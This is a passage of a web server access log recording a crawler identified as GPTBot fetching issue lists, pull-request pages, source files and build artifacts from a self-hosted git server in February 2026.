"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:18:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:18:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:18:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:18:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=open&type=all" -[17/Feb/2026:18:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:18:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp?display=source" [Client 74.7.227.38] [Length 13541] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12807] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp?display=source" [Client 74.7.227.38] [Length 12806] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15374] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp?display=source" [Client 74.7.227.38] [Length 15373] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 10244] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" -[17/Feb/2026:18:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" -[17/Feb/2026:18:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py.old" -[17/Feb/2026:18:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:22:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" -[17/Feb/2026:18:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/dist" -[17/Feb/2026:18:22:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" -[17/Feb/2026:18:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/dist" -[17/Feb/2026:18:22:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" -[17/Feb/2026:18:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/dist" -[17/Feb/2026:18:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" -[17/Feb/2026:18:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 11074] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" -[17/Feb/2026:18:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 11088] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" -[17/Feb/2026:18:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" -[17/Feb/2026:18:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2f%ec%84%a4%ec%b9%98%ed%8c%a8%ed%82%a4%ec%a7%80%20%ec%b2%b4%ed%81%ac%20by%20claude.md" [Client 74.7.227.38] [Length 27663] [Gzip 6.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:18:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" -[17/Feb/2026:18:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:18:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 9849] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:18:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 1009] [Gzip -] [Sent-to 